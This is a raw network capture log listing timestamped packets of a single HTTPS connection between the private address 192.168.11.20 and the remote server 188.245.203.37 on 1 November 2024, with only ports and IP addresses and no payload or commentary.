Nov 1, 2024 20:57:51.678961039 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.679071903 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.684787035 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.684804916 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.684926987 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.684973955 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.684973955 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.685019970 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.685019970 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.685019970 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.685019970 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.685019970 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.685028076 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.685069084 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.685209990 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.689045906 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.689063072 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.689254045 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.689254999 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.689271927 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.689282894 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.689282894 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.689328909 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.689456940 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.693526983 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.693542957 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.693670034 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.693670034 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.693743944 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.693743944 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.693743944 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.693763971 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.693769932 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.693840027 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.693941116 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.698075056 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.698091984 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.698237896 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.698260069 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.698260069 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.698270082 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.698340893 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.698340893 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.698359013 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.698421955 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.701924086 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.701941013 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.702058077 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.702059031 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.702105045 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.702105045 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.702105045 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.702116013 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.702202082 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.702269077 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.708786011 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.708885908 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.709148884 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.709148884 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.709167957 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.709167957 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.709167957 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.709167957 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.709178925 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.709265947 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.709265947 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.709443092 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.711532116 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.711549044 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.711673021 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.711673021 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.711765051 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.711765051 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.711777925 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.711815119 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.711913109 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.719227076 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.719243050 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.719445944 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.719459057 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.719572067 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.719625950 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.722094059 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.722110033 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.722250938 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.722250938 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.722317934 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.722317934 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.722317934 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.722327948 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.722440004 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.722547054 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.726131916 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.726152897 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.726291895 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.726291895 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.726341009 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.726387024 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.726387024 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.726393938 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.726490021 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.726532936 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.735450029 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.735471964 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.735611916 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.735658884 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.735658884 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.735666990 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.735708952 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.735708952 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.735708952 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.735708952 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.736300945 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.738135099 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.738156080 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.738303900 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.738303900 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.738353014 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.738401890 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.738401890 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.738409042 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.738454103 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.738616943 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.741300106 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.741319895 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.741424084 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.741470098 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.741470098 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.741470098 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.741482019 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.741522074 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.741570950 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.741616011 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.743911028 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.743931055 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.744071007 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.744206905 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.744225025 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.744389057 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.746488094 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.746507883 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.746716022 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.746716022 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.746737003 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.746750116 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.746750116 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.746824980 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.746927977 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.749644995 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.749665022 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.749825001 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.749825001 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.749845028 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.749866962 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.749948025 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.750056982 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.753067970 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.753088951 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.753221989 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.753268957 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.753268957 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.753269911 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.753269911 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.753269911 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.753269911 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.753287077 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.753297091 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.753396988 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.753443003 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.756750107 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.756773949 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.756917953 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.756918907 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.756941080 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.756941080 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.756952047 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.757015944 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.757075071 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.757075071 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.757637024 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.759916067 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.759944916 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.760101080 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.760209084 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.760216951 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.760390043 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.763624907 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.763643980 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.763761044 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.763804913 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.763804913 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.763804913 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.763804913 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.763818026 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.763856888 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.763962984 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.763962984 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.767951965 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.767987967 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.768115997 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.768116951 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.768162966 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.768210888 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.768219948 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.768332005 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.768409014 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.771097898 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.771119118 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.771627903 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.771627903 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.771651983 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.771651983 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.771651983 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.771651983 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.771651983 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.771667004 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.771732092 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.771790981 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.771811962 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.776272058 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.776292086 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.776577950 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.776577950 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.776597977 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.776747942 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.778546095 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.778567076 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.778702021 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.778762102 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.778762102 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.778773069 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.778805971 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.778929949 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.782407999 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.782428980 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.782587051 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.782587051 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.782605886 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.782605886 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.782605886 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.782605886 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.782605886 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.782618046 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.782763958 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.782826900 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.784951925 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.784972906 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.785088062 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.785135984 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.785135984 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.785135984 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.785304070 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.785314083 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.785482883 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.788557053 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.788578033 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.788753986 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.788753986 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.788772106 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.788780928 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.788780928 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.788780928 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.788860083 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.788976908 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.791980982 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.792000055 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.792114973 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.792114973 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.792156935 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.792156935 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.792208910 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.792254925 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.792260885 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.792397976 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.798907995 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.798928022 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.799410105 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.799410105 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.799429893 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.799429893 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.799429893 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.799429893 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.799443007 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.799482107 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.799482107 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.799482107 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.799525976 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.799643993 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.801090002 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.801109076 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.801292896 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.801292896 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.801309109 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.801340103 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.801340103 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.801340103 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.801387072 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.801485062 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.804145098 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.804161072 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.804323912 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.804399014 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.804399014 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.804416895 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.804435968 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.804436922 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.804436922 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.804481983 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.804553032 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.806700945 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.806720018 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.806863070 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.806912899 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.806912899 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.806925058 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.806941986 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.806941986 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.806941986 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.807008028 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.807109118 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.809643030 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.809662104 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.809786081 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.809786081 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.809849977 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.809849977 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.809849977 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.809849977 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.809849977 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.809864044 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.809874058 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.809874058 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.809943914 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.810050964 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.811978102 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.811994076 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.812144995 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.812144995 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.812158108 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.812249899 CET	49806	443	192.168.11.20	188.245.203.37
